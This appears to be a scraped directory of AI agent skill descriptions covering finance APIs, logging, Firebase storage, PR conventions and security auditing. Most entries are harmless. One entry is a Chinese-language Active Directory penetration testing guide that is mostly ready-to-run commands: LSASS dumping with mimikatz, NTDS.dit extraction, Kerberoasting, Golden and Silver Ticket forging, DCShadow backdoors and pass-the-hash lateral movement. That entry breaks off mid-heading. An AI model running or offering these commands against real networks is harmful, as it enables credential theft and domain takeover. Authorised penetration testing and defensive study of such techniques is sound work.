ing

Access and analyze comprehensive drug information from the DrugBank database including drug properties, interactions, targets, pathways, chemical structures,…

Fetch tweet content directly from fxtwitter API. Use when given a tweet/X URL to extract the tweet text, author, media, and engagement stats without loading…

Reconcile App Store Connect subscriptions and in-app purchases with RevenueCat products, entitlements, offerings, and packages using asc and RevenueCat MCP.…

How to use the Readwise CLI — access highlights, documents, and your entire reading library from the command line

Fetch financial data from the Funda AI API (https://api.funda.ai). Covers quotes, historical prices, financials, SEC filings, transcripts, analyst estimates, options flow/greeks/GEX, supply chain graph, social sentiment, Polymarket, congressional trades, economics, ESG, news, AI-enriched news (sentiment + event timeline), AI-company recruit signals, and a Claude API proxy via Bedrock. Triggers: stock quotes, balance sheet, income statement, cash flow, analyst targets, DCF, options chain/flow, GEX, IV rank, max pain, earnings/dividend/IPO calendar, 10-K/10-Q/8-K, suppliers/customers/competitors, insider trades, 13F, Reddit/Twitter sentiment, Polymarket, treasury rates, GDP, CPI, FRED, commodity/forex/crypto, stock screener, ETF holdings, COT, ticker sentiment, OpenAI/Anthropic/xAI/Google/Mercor/SurgeAI job postings, product launch probabilities, AI threat to public stocks. Also triggers for "funda" or "funda.ai". If only a ticker is provided and Funda API can answer, use this skill.

Grassroots-first campaign design for anyone being outspent — startups vs. incumbents, NGOs vs. corporate comms, movements vs. state-backed machines, solo brands vs. big-budget competitors. Ideates awareness, launch, fundraising, mobilization, community-build, counter-narrative, referral, founder-story, and coalition campaigns. Triggers on "campaign plan", "marketing strategy", "ad budget", "should I advertise", "paid vs organic", "launch plan", "grassroots", "low budget marketing", "NGO campaign", "outspent", "competitor has bigger budget", "how do I compete without money". Also trigger on any spend asymmetry, collapsing organic reach, rising CPAs, or a trust/credibility problem — even without the word "campaign". Nudge activation when the user debates buying ads, boosting posts, or hiring influencers; they are likely about to burn money on a channel that will not persuade.

Create pull requests following Sentry conventions. Use when opening PRs, writing PR descriptions, or preparing changes for review. Follows Sentry's code review…

Logging best practices for applications and services including structured logging, log levels, and log management strategies

Audit and monitor network requests made by OpenClaw skills. Detects data exfiltration, unauthorized API calls,

Implement automated secrets rotation for API keys, credentials, certificates, and encryption keys. Use when managing secrets lifecycle, compliance requirements, or security hardening.

Senior ISMS Audit Expert for internal and external information security management system auditing. Provides ISO 27001 audit expertise, security audit program…

Scan code for security vulnerabilities including OWASP Top 10, secrets, and misconfigurations. Use when you need comprehensive security analysis of a codebase.

Automatic quality control, linting, and static analysis procedures. Use after every code modification to ensure syntax correctness and project standards.…

Build with Firebase Cloud Storage - file uploads, downloads, and secure access. Use when: uploading images/files, generating download URLs, implementing file pickers, setting up storage security rules, or troubleshooting storage/unauthorized, cors errors, quota exceeded, or upload failed errors. Prevents 9 documented errors.

Builds dependency graph, detects cycles, validates boundary rules, calculates coupling metrics (Ca/Ce/I). Use when auditing dependency structure.

Active Directory 渗透测试技术指南 ## 信息收集 ### 域基础信息 - `nltest /domain_trusts` - 查看域信任关系 - `net view /domain` - 枚举域列表 - `nslookup -type=SRV _ldap._tcp.dc._msdcs.<domain>` - 定位域控制器 ### BloodHound 资产发现 ```powershell # SharpHound 数据收集 Invoke-BloodHound -CollectionMethod All -Domain target.com -ZipFileName loot.zip ``` ### LDAP 查询 ```powershell # 查找域管账户 ([adsisearcher]"(&(objectCategory=person)(objectClass=user)(adminCount=1))").FindAll() # 查找非约束委派的服务账户 Get-ADObject -LDAPFilter "(&(userAccountControl:1.2.840.113556.1.4.803:=524288)(samAccountType=805306368))" ``` ## 凭据获取 ### LSASS 内存提取 ```powershell # procdump + mimikatz 离线解析 procdump.exe -accepteula -ma lsass.exe lsass.dmp sekurlsa::minidump lsass.dmp sekurlsa::logonPasswords full ``` ### SAM/NTDS.dit 提取 ```powershell # Volume Shadow Copy 方式 vssadmin create shadow /for=C: copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\loot\ copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\loot\ # ntdsutil 官方工具 ntdsutil "ac i ntds" "ifm" "create full c:\loot" q q ``` ### Kerberoasting ```powershell # 请求 SPN 服务票据 Add-Type -AssemblyName System.IdentityModel New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/sql01.target.com:1433" # Rubeus 自动化 Rubeus.exe kerberoast /outfile:hashes.txt ``` ## Kerberos 攻击 ### AS-REP Roasting ```powershell # 查找 "Do not require Kerberos preauthentication" 账户 Get-ADUser -Filter {DoesNotRequirePreAuth -eq $true} -Properties DoesNotRequirePreAuth # Rubeus 攻击 Rubeus.exe asreproast /format:hashcat /outfile:asrep.txt ``` ### Golden Ticket ```powershell # 需要 krbtgt 账户的 NTLM hash mimikatz # lsadump::dcsync /domain:target.com /user:krbtgt mimikatz # kerberos::golden /user:Administrator /domain:target.com /sid:S-1-5-21-... /krbtgt:hash /ptt ``` ### Silver Ticket ```powershell # 针对特定服务，需要服务账户 NTLM hash mimikatz # kerberos::golden /user:fakeuser /domain:target.com /sid:S-1-5-21-... /target:sql01.target.com /service:MSSQLSvc /rc4:servicehash /ptt ``` ### DCShadow ```powershell # 需要域管权限，注册伪造 DC mimikatz # lsadump::dcshadow /object:targetuser /attribute:Description /value:"backdoor" ``` ## 横向移动 ### Pass-the-Hash ```powershell # mimikatz sekurlsa::pth /user:admin /domain:target.com /ntlm:hash /run:powershell.exe # Invoke-WMIExec Invoke-WMIExec -Target dc01.target.com -Username admin -Hash hash -Command "powershell -enc ..." ``` ### Over-Pass-the-Hash ```powershell # 获取 TGT 后使用正常 Kerberos 认证 Rubeus.exe asktgt /user:admin /rc4:hash /ptt ``` ### Pass-the-Ticket ```powershell # 导出票据后注入 mimikatz # sekurlsa::tickets /export mimikatz # kerberos::ptt [0;123456]-0-0-40810000-admin@krbtgt-target.com.kirbi ``` ### 约束委派滥用 ```powershell # 配置 S4U2Self + S4U2Proxy Rubeus.exe s4u /user:svc_account /rc4:hash /impersonateuser:admin /msdsspn:cifs/target.target.com /ptt ``` ### 基于资源的约束委派 (RBCD

Teaches the provider pattern for sharing data across component trees. Use when multiple nested components need access to the same data and prop drilling…

When the user wants to create, optimize, or audit a comparison table section—an in-page block (HTML table or responsive equivalent) comparing products,…

Auto-fixes low-risk tech debt (unused imports, dead code, commented-out code) with >=90% confidence. Use when audit findings need safe automated cleanup.

Verify technical accuracy of JavaScript concept pages by checking code examples, MDN/ECMAScript compliance, and external resources to prevent misinformation